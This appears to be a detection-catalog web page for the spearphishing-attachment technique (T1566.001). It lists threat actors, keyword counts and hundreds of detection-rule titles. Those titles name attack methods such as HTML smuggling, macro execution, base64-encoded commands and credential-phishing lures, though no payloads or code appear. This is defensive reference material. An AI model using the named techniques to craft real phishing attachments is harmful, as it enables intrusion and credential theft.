EXPLORE
Sign In
← Back to Explore
T1566.001

Spearphishing Attachment

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the sp...

LinuxmacOSWindows
850
Detections
4
Sources
77
Threat Actors

BY SOURCE

780sublime31splunk_escu21elastic18sigma

PROCEDURES (143)

Authentication Monitoring95 detections

Auto-extracted: 95 detections for authentication monitoring

Impersonat43 detections

Auto-extracted: 43 detections for impersonat

Credential39 detections

Auto-extracted: 39 detections for credential

Email Security39 detections

Auto-extracted: 39 detections for email security

General Monitoring38 detections

Auto-extracted: 38 detections for general monitoring

Impersonat33 detections

Auto-extracted: 33 detections for impersonat

Credential32 detections

Auto-extracted: 32 detections for credential

Attachment31 detections

Auto-extracted: 31 detections for attachment

Email27 detections

Auto-extracted: 27 detections for email

Service25 detections

Auto-extracted: 25 detections for service

Service20 detections

Auto-extracted: 20 detections for service

Phish19 detections

Auto-extracted: 19 detections for phish

Email18 detections

Auto-extracted: 18 detections for email

Network Connection Monitoring17 detections

Auto-extracted: 17 detections for network connection monitoring

Script Execution Monitoring16 detections

Auto-extracted: 16 detections for script execution monitoring

Phish15 detections

Auto-extracted: 15 detections for phish

Attachment15 detections

Auto-extracted: 15 detections for attachment

Credential13 detections

Auto-extracted: 13 detections for credential

Attachment13 detections

Auto-extracted: 13 detections for attachment

Base6411 detections

Auto-extracted: 11 detections for base64

Phish9 detections

Auto-extracted: 9 detections for phish

Impersonat9 detections

Auto-extracted: 9 detections for impersonat

Macro8 detections

Auto-extracted: 8 detections for macro

Download8 detections

Auto-extracted: 8 detections for download

Bypass8 detections

Auto-extracted: 8 detections for bypass

Bypass7 detections

Auto-extracted: 7 detections for bypass

Download7 detections

Auto-extracted: 7 detections for download

Credential7 detections

Auto-extracted: 7 detections for credential

Suspicious7 detections

Auto-extracted: 7 detections for suspicious

Suspicious6 detections

Auto-extracted: 6 detections for suspicious

Obfuscat6 detections

Auto-extracted: 6 detections for obfuscat

Office6 detections

Auto-extracted: 6 detections for office

Encrypt6 detections

Auto-extracted: 6 detections for encrypt

Unusual6 detections

Auto-extracted: 6 detections for unusual

Base646 detections

Auto-extracted: 6 detections for base64

Cloud5 detections

Auto-extracted: 5 detections for cloud

Credential5 detections

Auto-extracted: 5 detections for credential

Cloud4 detections

Auto-extracted: 4 detections for cloud

Process Creation Monitoring4 detections

Auto-extracted: 4 detections for process creation monitoring

Suspicious4 detections

Auto-extracted: 4 detections for suspicious

Suspicious4 detections

Auto-extracted: 4 detections for suspicious

Impersonat3 detections

Auto-extracted: 3 detections for impersonat

Http3 detections

Auto-extracted: 3 detections for http

Suspicious3 detections

Auto-extracted: 3 detections for suspicious

Service3 detections

Auto-extracted: 3 detections for service

Encrypt3 detections

Auto-extracted: 3 detections for encrypt

Encrypt3 detections

Auto-extracted: 3 detections for encrypt

Attachment3 detections

Auto-extracted: 3 detections for attachment

Child Process3 detections

Auto-extracted: 3 detections for child process

Child Process3 detections

Auto-extracted: 3 detections for child process

Download3 detections

Auto-extracted: 3 detections for download

Office3 detections

Auto-extracted: 3 detections for office

Api3 detections

Auto-extracted: 3 detections for api

Service3 detections

Auto-extracted: 3 detections for service

Email3 detections

Auto-extracted: 3 detections for email

Obfuscat3 detections

Auto-extracted: 3 detections for obfuscat

Download3 detections

Auto-extracted: 3 detections for download

Service3 detections

Auto-extracted: 3 detections for service

Phish2 detections

Auto-extracted: 2 detections for phish

Phish2 detections

Auto-extracted: 2 detections for phish

Remote2 detections

Auto-extracted: 2 detections for remote

Macro2 detections

Auto-extracted: 2 detections for macro

Obfuscat2 detections

Auto-extracted: 2 detections for obfuscat

Obfuscat2 detections

Auto-extracted: 2 detections for obfuscat

Email2 detections

Auto-extracted: 2 detections for email

Unusual2 detections

Auto-extracted: 2 detections for unusual

Office2 detections

Auto-extracted: 2 detections for office

Office2 detections

Auto-extracted: 2 detections for office

Suspicious2 detections

Auto-extracted: 2 detections for suspicious

Powershell2 detections

Auto-extracted: 2 detections for powershell

Bypass2 detections

Auto-extracted: 2 detections for bypass

Exfiltrat2 detections

Auto-extracted: 2 detections for exfiltrat

Exfiltrat2 detections

Auto-extracted: 2 detections for exfiltrat

Macro2 detections

Auto-extracted: 2 detections for macro

Evasion2 detections

Auto-extracted: 2 detections for evasion

Evasion2 detections

Auto-extracted: 2 detections for evasion

Macro2 detections

Auto-extracted: 2 detections for macro

Child Process2 detections

Auto-extracted: 2 detections for child process

Dns2 detections

Auto-extracted: 2 detections for dns

Command Line Monitoring2 detections

Auto-extracted: 2 detections for command line monitoring

Lateral2 detections

Auto-extracted: 2 detections for lateral

Masquerad1 detections

Auto-extracted: 1 detections for masquerad

Inject1 detections

Auto-extracted: 1 detections for inject

Attachment1 detections

Auto-extracted: 1 detections for attachment

Powershell1 detections

Auto-extracted: 1 detections for powershell

Aws1 detections

Auto-extracted: 1 detections for aws

Http1 detections

Auto-extracted: 1 detections for http

File Monitoring1 detections

Auto-extracted: 1 detections for file monitoring

Inject1 detections

Auto-extracted: 1 detections for inject

Unusual1 detections

Auto-extracted: 1 detections for unusual

Lateral1 detections

Auto-extracted: 1 detections for lateral

Remote1 detections

Auto-extracted: 1 detections for remote

Api1 detections

Auto-extracted: 1 detections for api

Service1 detections

Auto-extracted: 1 detections for service

Unusual1 detections

Auto-extracted: 1 detections for unusual

Token1 detections

Auto-extracted: 1 detections for token

Token1 detections

Auto-extracted: 1 detections for token

Http1 detections

Auto-extracted: 1 detections for http

Evasion1 detections

Auto-extracted: 1 detections for evasion

Parent Process1 detections

Auto-extracted: 1 detections for parent process

Email1 detections

Auto-extracted: 1 detections for email

Base641 detections

Auto-extracted: 1 detections for base64

Parent Process1 detections

Auto-extracted: 1 detections for parent process

Persist1 detections

Auto-extracted: 1 detections for persist

Bypass1 detections

Auto-extracted: 1 detections for bypass

Macro1 detections

Auto-extracted: 1 detections for macro

Privilege1 detections

Auto-extracted: 1 detections for privilege

Masquerad1 detections

Auto-extracted: 1 detections for masquerad

Registry1 detections

Auto-extracted: 1 detections for registry

Powershell1 detections

Auto-extracted: 1 detections for powershell

Unusual1 detections

Auto-extracted: 1 detections for unusual

Aws1 detections

Auto-extracted: 1 detections for aws

Cloud1 detections

Auto-extracted: 1 detections for cloud

Inject1 detections

Auto-extracted: 1 detections for inject

Unusual1 detections

Auto-extracted: 1 detections for unusual

Oauth1 detections

Auto-extracted: 1 detections for oauth

Oauth1 detections

Auto-extracted: 1 detections for oauth

Inject1 detections

Auto-extracted: 1 detections for inject

Bypass1 detections

Auto-extracted: 1 detections for bypass

Phish1 detections

Auto-extracted: 1 detections for phish

Parent Process1 detections

Auto-extracted: 1 detections for parent process

Parent Process1 detections

Auto-extracted: 1 detections for parent process

Api1 detections

Auto-extracted: 1 detections for api

Remote1 detections

Auto-extracted: 1 detections for remote

Oauth1 detections

Auto-extracted: 1 detections for oauth

Child Process1 detections

Auto-extracted: 1 detections for child process

Registry1 detections

Auto-extracted: 1 detections for registry

Module Load Monitoring1 detections

Auto-extracted: 1 detections for module load monitoring

Bypass1 detections

Auto-extracted: 1 detections for bypass

Remote1 detections

Auto-extracted: 1 detections for remote

Privilege1 detections

Auto-extracted: 1 detections for privilege

Exfiltrat1 detections

Auto-extracted: 1 detections for exfiltrat

Impersonat1 detections

Auto-extracted: 1 detections for impersonat

Impersonat1 detections

Auto-extracted: 1 detections for impersonat

Aws1 detections

Auto-extracted: 1 detections for aws

Attachment1 detections

Auto-extracted: 1 detections for attachment

Evasion1 detections

Auto-extracted: 1 detections for evasion

Credential1 detections

Auto-extracted: 1 detections for credential

Impersonat1 detections

Auto-extracted: 1 detections for impersonat

Cloud1 detections

Auto-extracted: 1 detections for cloud

Credential1 detections

Auto-extracted: 1 detections for credential

Persist1 detections

Auto-extracted: 1 detections for persist

Exfiltrat1 detections

Auto-extracted: 1 detections for exfiltrat

THREAT ACTORS (77)

admin@338Ajax Security TeamAndarielAPT-C-36APT1APT12APT19APT28APT29APT30APT32APT33APT37APT38APT39APT41BITTERBlackTechBRONZE BUTLERCobalt GroupConfuciusCURIUMDarkhotelDarkHydrusDragonflyElderwoodEXOTIC LILYFerocious KittenFIN4FIN6FIN7FIN8GallmakerGamaredon GroupGorgon GroupHigaisaInceptionIndigoZebraKimsukyLazarus GroupLazyScripterLeviathanMacheteMalteiromenuPassMofangMoleratsMoonstone SleetMuddyWaterMustang PandaNaikonNomadic OctopusOilRigPatchworkPLATINUMRancorRedCurlRTMSaint BearSandworm TeamSideCopySidewinderSilenceStar BlizzardTA2541TA459TA505TA551The White CompanyThreat Group-3390Tonto TeamTransparent TribeTropic TrooperWindshiftWinter VivernWIRTEWizard Spider

DETECTIONS (850)

Abuse: Cloudflare Workers Hosted EvilTokens Domain Structure
sublimehigh
Adobe branded PDF file linking to a password-protected file from untrusted sender
sublimehigh
AnonymousFox indicators
sublimehigh
Anthropic Magic String in HTML
sublimelow
Arbitrary Shell Command Execution Via Settingcontent-Ms
sigmamedium
Attachment soliciting user to enable macros
sublimehigh
Attachment with auto-executing macro (unsolicited)
sublimemedium
Attachment with auto-opening VBA macro (unsolicited)
sublimemedium
Attachment with encrypted zip (unsolicited)
sublimemedium
Attachment with high risk VBA macro (unsolicited)
sublimehigh
Attachment with macro calling executable
sublimehigh
Attachment with suspicious author (unsolicited)
sublimehigh
Attachment with unscannable encrypted zip (unsolicited)
sublimemedium
Attachment with VBA macros from employee impersonation (unsolicited)
sublimehigh
Attachment: .csproj with suspicious commands
sublimehigh
Attachment: 7z Archive Containing RAR File
sublimemedium
Attachment: Adobe image lure in body or attachment with suspicious link
sublimemedium
Attachment: Any .sap file (unsolicited)
sublimelow
Attachment: Any HTML file within archive (unsolicited)
sublimemedium
Attachment: Archive containing disallowed file type
sublimelow
Attachment: Archive containing HTML file with file scheme link
sublimehigh
Attachment: Archive contains DLL-loading macro
sublimehigh
Attachment: Archive with embedded CHM file
sublimemedium
Attachment: Archive with embedded EXE file
sublimehigh
Attachment: Archive with pdf, txt and wsf files
sublimemedium
Attachment: Base64 encoded bash command in filename
sublimehigh
Attachment: Calendar file with invisible Unicode characters
sublimehigh
Attachment: Calendar invite with Google redirect and invoice request
sublimemedium
Attachment: cmd file extension
sublimelow
Attachment: Compensation review lure with QR code
sublimehigh
Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability
sublimecritical
Attachment: CVE-2023-21716 - Microsoft Office Remote Code Execution Vulnerability
sublimehigh
Attachment: CVE-2025-24071 - Microsoft Windows File Explorer Spoofing Vulnerability
sublimecritical
Attachment: Decoy PDF author (Julie P.)
sublimehigh
Attachment: DocuSign impersonation via PDF linking to new domain
sublimemedium
Attachment: DocX embedded binary
sublimehigh
Attachment: DOCX with hyperlink targeting recipient address
sublimemedium
Attachment: Double base64-encoded zip file in HTML smuggling attachment
sublimehigh
Attachment: Dropbox image lure with no Dropbox domains in links
sublimemedium
Attachment: EICAR string present
sublimelow
Attachment: Embedded Javascript in SVG file
sublimehigh
Attachment: Embedded VBScript in MHT file (unsolicited)
sublimemedium
Attachment: EML containing a base64 encoded script
sublimehigh
Attachment: EML file contains HTML attachment with login portal indicators
sublimehigh
Attachment: EML file with HTML attachment (unsolicited)
sublimemedium
Attachment: EML file with IPFS links
sublimemedium
Attachment: EML with embedded Javascript in SVG file
sublimehigh
Attachment: EML with Encrypted ZIP
sublimelow
Attachment: EML with link to credential phishing page
sublimehigh
Attachment: EML with QR code redirecting to Cloudflare challenges
sublimelow
Attachment: EML with SharePoint files shared from GoDaddy federated tenants
sublimelow
Attachment: EML with Sharepoint link likely unrelated to sender
sublimemedium
Attachment: EML with suspicious indicators
sublimemedium
Attachment: Emotet heavily padded doc in zip file
sublimehigh
Attachment: Employment contract update with suspicious file naming
sublimehigh
Attachment: Encrypted Microsoft Office file (unsolicited)
sublimemedium
Attachment: Encrypted PDF with credential theft body
sublimemedium
Attachment: Encrypted ZIP containing VHDX file
sublimemedium
Attachment: Encrypted zip file with payment-related lure
sublimemedium
Attachment: Excel file with document sharing lure created by Go Excelize
sublimehigh
Attachment: Excel file with suspicious template identifier
sublimehigh
Attachment: Excel Web Query File (IQY)
sublimehigh
Attachment: Fake attachment image lure
sublimemedium
Attachment: Fake scan-to-email
sublimemedium
Attachment: Fake secure message and suspicious indicators
sublimemedium
Attachment: Fake Slack installer
sublimehigh
Attachment: Fake voicemail via PDF
sublimemedium
Attachment: Fake Zoom installer
sublimehigh
Attachment: File execution via Javascript
sublimemedium
Attachment: Filename containing Unicode braille pattern blank character
sublimehigh
Attachment: Filename containing Unicode right-to-left override character
sublimehigh
Attachment: Finance themed PDF with observed phishing template
sublimemedium
Attachment: HTML attachment with Javascript location
sublimehigh
Attachment: HTML attachment with login portal indicators
sublimemedium
Attachment: HTML file contains exclusively Javascript
sublimemedium
Attachment: HTML file with excessive 'const' declarations and abnormally long timeouts
sublimehigh
Attachment: HTML file with excessive padding and suspicious patterns
sublimehigh
Attachment: HTML file with reference to recipient and suspicious patterns
sublimehigh
Attachment: HTML smuggling - QR Code with suspicious links
sublimehigh
Attachment: HTML smuggling 'body onload' linking to suspicious destination
sublimehigh
Attachment: HTML smuggling 'body onload' with high entropy and suspicious text
sublimehigh
Attachment: HTML smuggling Microsoft sign in
sublimehigh
Attachment: HTML smuggling with atob and high entropy
sublimehigh
Attachment: HTML smuggling with atob and high entropy via calendar invite
sublimehigh
Attachment: HTML smuggling with auto-downloaded file
sublimehigh
Attachment: HTML smuggling with base64 encoded JavaScript function
sublimehigh
Attachment: HTML smuggling with base64 encoded ZIP file
sublimemedium
Attachment: HTML smuggling with concatenation obfuscation
sublimehigh
Attachment: HTML smuggling with decimal encoding
sublimehigh
Attachment: HTML smuggling with embedded base64 streamed file download
sublimehigh
Attachment: HTML smuggling with embedded base64-encoded executable
sublimehigh
Attachment: HTML smuggling with embedded base64-encoded ISO
sublimehigh
Attachment: HTML smuggling with eval and atob
sublimehigh
Attachment: HTML smuggling with eval and atob via calendar invite
sublimehigh
Attachment: HTML smuggling with excessive line break obfuscation
sublimehigh
Attachment: HTML smuggling with excessive string concatenation and suspicious patterns
sublimemedium
Attachment: HTML smuggling with fromCharCode and other signals
sublimehigh
Attachment: HTML smuggling with hex strings
sublimemedium
Attachment: HTML smuggling with high entropy and other signals
sublimehigh
Attachment: HTML smuggling with raw array buffer
sublimehigh
Attachment: HTML smuggling with RC4 decryption
sublimehigh
Attachment: HTML smuggling with ROT13
sublimehigh
Attachment: HTML smuggling with setTimeout
sublimehigh
Attachment: HTML smuggling with unescape
sublimehigh
Attachment: HTML with emoji-to-character map
sublimehigh
Attachment: HTML with hidden body
sublimehigh
Attachment: HTML with JavaScript functions for HTTP requests
sublimehigh
Attachment: HTML with obfuscation and recipient's email in JavaScript strings
sublimehigh
Attachment: ICS calendar with embedded file from internal sender with SPF failure
sublimehigh
Attachment: ICS file with AWS Lambda URL
sublimemedium
Attachment: ICS file with excessive custom properties
sublimemedium
Attachment: ICS file with meeting prefix
sublimehigh
Attachment: ICS file with non-Gregorian calendar scale
sublimemedium
Attachment: ICS with embedded document
sublimelow
Attachment: ICS with embedded Javascript in SVG file
sublimehigh
Attachment: ICS with employee policy review lure
sublimehigh
Attachment: JavaScript file with suspicious base64-encoded executable
sublimehigh
Attachment: Legal themed message or PDF with suspicious indicators
sublimemedium
Attachment: Link file with UNC path
sublimemedium
Attachment: Link to Doubleclick.net open redirect
sublimemedium
Attachment: LNK file
sublimehigh
Attachment: LNK with embedded content
sublimehigh
Attachment: Macro files containing MHT content
sublimemedium
Attachment: Macro with suspected use of COM ShellBrowserWindow object for process creation
sublimehigh
Attachment: Malformed OLE file
sublimehigh
Attachment: Malicious OneNote commands
sublimehigh
Attachment: Microsoft 365 credential phishing
sublimehigh
Attachment: Microsoft impersonation via PDF with link and suspicious language
sublimehigh
Attachment: MS Office or RTF file with Shell.Explorer.1 com object with embedded LNK
sublimemedium
Attachment: MSI installer file
sublimemedium
Attachment: Office document loads remote document template
sublimemedium
Attachment: Office document with VSTO add-in
sublimehigh
Attachment: Office file contains OLE relationship to credential phishing page
sublimehigh
Attachment: Office file with credential phishing URLs
sublimemedium
Attachment: Office file with document sharing and browser instruction lures
sublimehigh
Attachment: Office file with suspicious function calls or downloaded file path
sublimehigh
Attachment: OLE external relationship containing file scheme link to executable filetype
sublimehigh
Attachment: OLE external relationship containing file scheme link to IP address
sublimehigh
Attachment: Password-protected PDF with fake document indicators
sublimemedium
Attachment: PDF bid/proposal lure with credential theft indicators
sublimemedium
Attachment: PDF contains W9 or invoice YARA signatures
sublimemedium
Attachment: PDF file with embedded content
sublimehigh
Attachment: PDF file with low reputation link to ZIP file (unsolicited)
sublimemedium
Attachment: PDF file with low reputation links to suspicious filetypes (unsolicited)
sublimemedium
Attachment: PDF generated with wkhtmltopdf tool and default title
sublimelow
Attachment: PDF Object Hash - Encrypted PDFs with fake payment notification
sublimemedium
Attachment: PDF proposal with credential theft indicators
sublimehigh
Attachment: PDF with a suspicious string and single URL
sublimehigh
Attachment: PDF with credential theft language and invalid reply-to domain
sublimemedium
Attachment: PDF with credential theft language and link to a free subdomain (unsolicited)
sublimemedium
Attachment: PDF with embedded Javascript
sublimemedium
Attachment: PDF with link to DMG file download
sublimemedium
Attachment: PDF with link to zip containing a wsf file
sublimehigh
Attachment: PDF with Microsoft Purview message impersonation
sublimemedium
Attachment: PDF with multistage landing - ClickUp abuse
sublimehigh
Attachment: PDF with password in filename matching body text
sublimemedium
Attachment: PDF with personal Microsoft OneNote URL
sublimemedium
Attachment: PDF with recipient email in link
sublimehigh
Attachment: PDF with ReportLab library and default metadata
sublimelow
Attachment: PDF with suspicious HeadlessChrome metadata
sublimemedium
Attachment: PDF with suspicious language and redirect to suspicious file type
sublimehigh
Attachment: PDF with suspicious link and action-oriented language
sublimehigh
Attachment: Potential sandbox evasion in Office file
sublimehigh
Attachment: PowerPoint with suspicious hyperlink
sublimehigh
Attachment: PowerShell content
sublimehigh
Attachment: QR code link with base64-encoded recipient address
sublimehigh
Attachment: QR code with credential phishing indicators
sublimemedium
Attachment: QR code with encoded recipient targeting and redirect indicators
sublimehigh
Attachment: QR code with recipient targeting and special characters
sublimehigh
Attachment: QR code with suspicious URL patterns in EML file
sublimehigh
Attachment: QR code with userinfo portion
sublimehigh
Attachment: RDP connection file
sublimemedium
Attachment: RFC822 containing suspicious file sharing language with links from untrusted sender
sublimemedium
Attachment: RTF file with suspicious link
sublimemedium
Attachment: RTF with embedded content
sublimemedium
Attachment: Self-sender PDF with minimal content and view prompt
sublimehigh
Attachment: SFX archive containing commands
sublimemedium
Attachment: Small text file with link containing recipient email address
sublimemedium
Attachment: Soda PDF producer with encryption themes
sublimehigh
Attachment: Suspicious employee policy update document lure
sublimemedium
Attachment: Suspicious PDF created with headless browser
sublimehigh
Attachment: SVG file execution
sublimehigh
Attachment: SVG files with evasion elements
sublimehigh
Attachment: Uncommon compressed file
sublimelow
Attachment: Web files with suspicious comments
sublimehigh
Attachment: WinRAR CVE-2025-8088 exploitation
sublimehigh
Attachment: XLSX file with suspicious print titles metadata
sublimehigh
Attachment: ZIP file with CVE-2026-0866 exploit
sublimemedium
Benefits enrollment impersonation
sublimehigh
Body HTML: Recipient SLD in HTML class
sublimemedium
Body: Embedded email headers indicative of thread hijacking/abuse
sublimemedium
Brand impersonation: AARP
sublimemedium
Brand impersonation: Adobe (QR code)
sublimehigh
Brand impersonation: Adobe Sign with suspicious indicators
sublimehigh
Brand impersonation: Adobe with suspicious language and link
sublimehigh
Brand impersonation: ADP
sublimemedium
Brand impersonation: AliExpress
sublimemedium
Brand impersonation: Amazon
sublimelow
Brand impersonation: Amazon Web Services (AWS)
sublimemedium
Brand impersonation: Amazon with suspicious attachment
sublimemedium